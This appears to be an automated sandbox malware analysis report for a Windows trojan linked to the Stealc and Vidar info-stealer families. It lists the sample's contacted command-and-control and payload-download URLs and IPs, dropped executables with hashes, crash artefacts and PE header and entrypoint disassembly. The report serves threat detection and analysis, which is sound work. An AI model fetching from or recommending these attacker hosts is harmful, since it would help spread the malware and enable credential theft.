http://176.113.115.19/ScreenUpdateSync.exexr	ief722WreR.exe, 00000000.00000003.1296872109.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89/45c616e921a794b8.phpE	DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89/697b92cb4e247842/sqlite3.dll	DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exe	ief722WreR.exe, ief722WreR.exe, 00000000.00000003.3546343202.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000003.1296872109.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000003.1296872109.0000000000BA0000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000002.3676687673.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000002.3677983339.0000000003200000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89/2b	DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.56.70	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
92.255.57.89	unknown	Russian Federation	42253	TELSPRU	true
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572568
Start date and time:	2024-12-10 17:41:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ief722WreR.exe renamed because original name is a hash value
Original Sample Name:	0b9795bc5978c62899793b157271e979.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/7@1/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 52 Number of non-executed functions: 337
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.246.63, 4.175.87.197, 40.126.53.16
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: ief722WreR.exe

Simulations

Behavior and APIs

Time	Type	Description
11:42:07	API Interceptor	8751948x Sleep call for process: ief722WreR.exe modified
13:19:00	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.56.70	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse
	vwkb5DQRAL.exe	Get hash	malicious	Stealc, Vidar	Browse
	Tg3sk2wywR.exe	Get hash	malicious	Stealc	Browse
	x8AH98H0eQ.exe	Get hash	malicious	Stealc	Browse
	x8AH98H0eQ.exe	Get hash	malicious	Unknown	Browse
	zGHItMC5Zc.exe	Get hash	malicious	Stealc	Browse
	ozcAR7VO6Y.exe	Get hash	malicious	Stealc	Browse
	9gBcr7l7jT.exe	Get hash	malicious	Stealc	Browse
	Zbls3lMGhD.exe	Get hash	malicious	Stealc	Browse
92.255.57.89	yZB8qfUJJu.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
	5gR5rEGCfw.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.89/45c616e921a794b8.php
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	92.255.57.89/45c616e921a794b8.php
176.113.115.19	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
post-to-me.com	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.56.70
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	vwkb5DQRAL.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.56.70
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse	172.67.179.207
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	0r9PL33C8E.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	Pw2KHOL9Z8.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	Tg3sk2wywR.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	x8AH98H0eQ.exe	Get hash	malicious	Stealc	Browse	104.21.56.70

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	AdobePDQ5.6.1.msi	Get hash	malicious	Unknown	Browse	162.159.140.238
	AdobeViewerPDQv2.msi	Get hash	malicious	Unknown	Browse	162.159.140.238
	https://desactivacion-correo.s3.eu-north-1.amazonaws.com/es.html	Get hash	malicious	Unknown	Browse	172.67.8.141
	https://app.droplet.io/form/Ko1loy	Get hash	malicious	Unknown	Browse	104.18.17.155
	http://riginaros.blogspot.com/#x034rT96G0	Get hash	malicious	Porn Scam	Browse	104.21.16.1
	download.ps1	Get hash	malicious	Python BackDoor	Browse	104.20.22.46
	https://8lye.zemifor.ru/AELKFIZNEFDBTAHDVVECCPNIETD459FBOSL3MNKP6ZQ?akpsmqmipdifvgvgwktrpvk235317236085203wfjcuo8jl4u8d22sb	Get hash	malicious	Unknown	Browse	104.21.30.120
	1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exe	Get hash	malicious	Remcos	Browse	172.64.41.3
	REMITTANCE_100NzA1Sada.htm	Get hash	malicious	Unknown	Browse	162.159.140.237
	REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exe	Get hash	malicious	GuLoader	Browse	188.114.96.6
TELSPRU	yZB8qfUJJu.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	5gR5rEGCfw.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.89
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	92.255.57.89
	https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9	Get hash	malicious	Unknown	Browse	92.255.57.144
	https://reviewgustereports.com/	Get hash	malicious	CAPTCHA Scam ClickFix, XWorm	Browse	92.255.57.155
	S1NrYNOYhZ.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.88
	S4h5LcSjJc.exe	Get hash	malicious	Stealc	Browse	92.255.57.88
	8z6iZ5YzKB.exe	Get hash	malicious	Stealc	Browse	92.255.57.88
	sXWh51zcTv.exe	Get hash	malicious	Stealc	Browse	92.255.57.88
	cTjQ45fs0O.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.88
SELECTELRU	5gR5rEGCfw.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.215
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	45.89.231.211
	5EZLEXDveC.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	176.113.115.163
	teste.sh4.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	45.138.214.123
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	176.124.33.0
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.37
	442.docx.exe	Get hash	malicious	RMSRemoteAdmin	Browse	109.234.156.179
	442.docx.exe	Get hash	malicious	RMSRemoteAdmin	Browse	109.234.156.179
	nabppc.elf	Get hash	malicious	Unknown	Browse	85.119.147.53

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.56.70
	Bank Swift and SOA PRN0072700314159453_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.56.70
	ST07933.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.56.70
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	104.21.56.70
	FPqVs6et5F.exe	Get hash	malicious	Unknown	Browse	104.21.56.70
	c2.hta	Get hash	malicious	XWorm	Browse	104.21.56.70
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.56.70
	lFxGd66yDa.exe	Get hash	malicious	NetSupport RAT	Browse	104.21.56.70
	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	104.21.56.70

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DADE.tmp.exe_3872fee5b628139f465ff3bc0a6daa30fd1e_fe35796b_084e609a-637f-4dbf-a000-58a93858c116\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.966646448906164
Encrypted:	false
SSDEEP:	192:6Eqy1Sx0kXkstOgAhjucZrP2izuiFJZ24IO84XU:6TGSykXkstOZjNFzuiFJY4IO86
MD5:	FC02FB1B72D0D390D16E1B7B5D5F0D11
SHA1:	EA0C67FBF9047FD8E81CCE177B2A1A70AB18C66C
SHA-256:	33C0D5791C30C84F8453E3F5DFAAA6ADA2B6944931CFC57E6691E63F64495019
SHA-512:	FFA4A1B6C20BBB910DAF64F0DA8E6E48C9C918EEE5E79CB4FB9469015E8D2D937CA9AC924E4CCC1FFA45C3FB6BA664698408E650CED86B964597EC8D8901DA3F
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.2.8.3.0.9.7.6.8.3.8.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.2.8.3.1.0.3.3.0.8.2.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.4.e.6.0.9.a.-.6.3.7.f.-.4.d.b.f.-.a.0.0.0.-.5.8.a.9.3.8.5.8.c.1.1.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.7.d.d.f.9.a.-.a.a.5.7.-.4.c.3.c.-.b.4.b.f.-.7.d.1.c.a.3.d.0.2.6.c.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.A.D.E...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.3.4.-.0.0.0.1.-.0.0.1.4.-.4.e.a.0.-.d.9.7.4.2.2.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.a.d.3.7.1.5.7.6.0.f.8.c.4.9.d.4.4.9.8.e.9.d.4.5.4.7.c.2.9.3.0.0.0.0.1.5.0.6.!.0.0.0.0.2.1.2.a.9.b.2.4.2.5.a.3.b.7.e.a.5.8.6.1.d.f.c.8.2.0.4.8.4.7.b.f.5.8.7.2.d.0.b.e.!.D.A.D.E...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CB7.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Dec 10 18:18:29 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	62288
Entropy (8bit):	1.8180793469528476
Encrypted:	false
SSDEEP:	192:xLVB+6X4vhBvDXn7OIOJwbH7cHG37gg46za4WHGJ4gGUtDuUG30hq7nhjO3b+:r8vhBveIEKAwuTmJld8kWj/
MD5:	AD5642C7BDE3F0A12C2621C6D8331C65
SHA1:	D4C45E6F9B0FC97407CC862AC6F0B69095E43F94
SHA-256:	FCA61A7CC8C641FE175780E7A22AB9FC7AB035D37B9C48A6E8A616E934168FCF
SHA-512:	7B5820D580EFF0DF51C046C8E9AC6AD02BF6A7D49E75199BC592BF504F7D1146CD0BD52B3121CE1041BE68119783DA73DAEDE6E7E30CCB16126E76638755DB92
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........Xg............4...............<............*..........T.......8...........T...........x3.........................................................................................................eJ......H.......GenuineIntel............T.......4...aoXg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DB2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8328
Entropy (8bit):	3.694292384375268
Encrypted:	false
SSDEEP:	192:R6l7wVeJF06q0mv6YsQ6lbgmfb4t8ibapDy89bHVsfzNm:R6lXJG6fmv6YD6lbgmfbe8ibMHufE
MD5:	525D28ED1FDC4EEA645AA6EAE62B04CD
SHA1:	42924D3B482BCB2D0DD06DBDCBD52234FC2BC6FB
SHA-256:	CB4AB68D272B2366B657CA0683C9DF0FAAA1052845E441284305D798E5481DE6
SHA-512:	601F2A9C994EAE14DD6BACD264B4F77F171C8144C16A4597CB7688D34694BD066BF5C83A100C2BE6C080A5D968DFD357E0B2366DD421F69A480333E946C81A2C
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DD2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4575
Entropy (8bit):	4.4528149916088955
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZJg77aI96A+XWpW8VYXYm8M4JVwEeFSj+q8ixLx9lguzyuUd:uIjfrI7cA+m7VHJTjfx9bz/Ud
MD5:	60569DA63264AA06CDEA560E0F0763BB
SHA1:	658899EB04328D9E266F654D85BFA65A42F2365D
SHA-256:	C2071237847DD6669D6CA6104404A5BCAAEC7097109A384DDB5327517B0D2CC2
SHA-512:	10630DAE5C026EECB71C07A5E7A744A74E3AEBF7B91215241DE42735E8EDB0EC372507BE5657D257947C188DEF6C12C0B8C89BA11827C30F92A0B26931EBCD2A
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625521" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\ief722WreR.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	303104
Entropy (8bit):	6.247547894665839
Encrypted:	false
SSDEEP:	6144:Ea5OEPJcQ7Tk95eOT0XJaj2L6lqAgLhu:YQHk95eOT0vL0qV
MD5:	017E73F6839555AA663A62235A81B433
SHA1:	212A9B2425A3B7EA5861DFC8204847BF5872D0BE
SHA-256:	41C2C33823D372F8389B978FDAEF60EB6D02AEA21BF20B1AAD7A11BDE5F5DCA8
SHA-512:	C6EC29111019290C60202053674725B6CD978C599843D7E7EEEF9482809EC9EDBCA18B5181B764A9DAB2E3C9E5A76F34B8841E1B2FA6EBFFA0C52A4588023641
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L...=..d......................?...................@...........................B.............................................4...<.....@.................................................................................`............................text............................... ..`.rdata..L ......."..................@..@.data....=..0...l..................@....rsrc.........@.....................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Download File

Process:	C:\Users\user\Desktop\ief722WreR.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	303104
Entropy (8bit):	6.247547894665839
Encrypted:	false
SSDEEP:	6144:Ea5OEPJcQ7Tk95eOT0XJaj2L6lqAgLhu:YQHk95eOT0vL0qV
MD5:	017E73F6839555AA663A62235A81B433
SHA1:	212A9B2425A3B7EA5861DFC8204847BF5872D0BE
SHA-256:	41C2C33823D372F8389B978FDAEF60EB6D02AEA21BF20B1AAD7A11BDE5F5DCA8
SHA-512:	C6EC29111019290C60202053674725B6CD978C599843D7E7EEEF9482809EC9EDBCA18B5181B764A9DAB2E3C9E5A76F34B8841E1B2FA6EBFFA0C52A4588023641
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L...=..d......................?...................@...........................B.............................................4...<.....@.................................................................................`............................text............................... ..`.rdata..L ......."..................@..@.data....=..0...l..................@....rsrc.........@.....................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.416622393547009
Encrypted:	false
SSDEEP:	6144:Fcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNa5+:ii58oSWIZBk2MM6AFBko
MD5:	D17643091187307C466D93F80417E63A
SHA1:	15042029AE7623A333B4814AA0380D650E992404
SHA-256:	19ADFB2D9E2FC6E683E5E41B494E4272A020895E72241D0F829E4F81B1FEB87E
SHA-512:	F8B8359FBA9BC48FBAFF4D2F51ED71FEBBF908B15A42690A039F3B08419B47D9D31A89BE7D38BF6E047FB086E4CEFC0D65092232126F10A4FC242DE072C70D59
Malicious:	false
Reputation:	low
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm>d../K..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.967371171299938
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ief722WreR.exe
File size:	429'568 bytes
MD5:	0b9795bc5978c62899793b157271e979
SHA1:	d31405a2caf535d882fe873473df1badd7d5d028
SHA256:	60af68dc8e940dae29691baa206ab9638bcff227b814c6cc33420edc0b3ac80b
SHA512:	ba7054eaa9ae5eb5a17fbb30a9ed0200cc11fee439d7795b6e78ea8fce3c5592ed6710eac1ecf5396ece510cf4972ae870e16de38af17580586cc39d0ad2387e
SSDEEP:	12288:K3r16Nwm9j++TwWOQzHfFlQps+QMUoF9AFs7:K71wF++TLOYFl9MUo7AFs7
TLSH:	2194E04175F1D821EEF75B711970E6A40ABBBC636B71519E3694B65F2E332E0CA21303
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L....".e...

File Icon


Icon Hash:	46c7c30b0f4e0d19

Static PE Info

General

Entrypoint:	0x4014f7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65A522B6 [Mon Jan 15 12:19:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	d3b3bde725d7f4017897955975268d5d

Entrypoint Preview

Instruction
call 00007F75ECCD0960h
jmp 00007F75ECCCDE5Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00454878h], eax
mov dword ptr [00454874h], ecx
mov dword ptr [00454870h], edx
mov dword ptr [0045486Ch], ebx
mov dword ptr [00454868h], esi
mov dword ptr [00454864h], edi
mov word ptr [00454890h], ss
mov word ptr [00454884h], cs
mov word ptr [00454860h], ds
mov word ptr [0045485Ch], es
mov word ptr [00454858h], fs
mov word ptr [00454854h], gs
pushfd
pop dword ptr [00454888h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0045487Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00454880h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0045488Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004547C8h], 00010001h
mov eax, dword ptr [00454880h]
mov dword ptr [0045477Ch], eax
mov dword ptr [00454770h], C0000409h
mov dword ptr [00454774h], 00000001h
mov eax, dword ptr [00452004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00452008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000B4h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x50834	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42e000	0x11cc8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x504f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4f000	0x160	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4dccc	0x4de00	cc5bee7963cf813b632d57b3f0622a30	False	0.8526566262038523	data	7.553001973414483	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4f000	0x204c	0x2200	7f010f040da264d9dc64b82bba55b25c	False	0.35994944852941174	data	5.4126526275478986	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x52000	0x3db0d8	0x6c00	b9a76504a8cf3311613e2dc773a194f9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x42e000	0x11cc8	0x11e00	5d54ec624e8b578d6d368ac1d1559939	False	0.5183703015734266	data	5.465191984718679	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x4391a8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x4392d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x43b8a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_ICON	0x42e6f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Syriac	Syriac	0.36353944562899787
RT_ICON	0x42f598	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Syriac	Syriac	0.5094765342960289
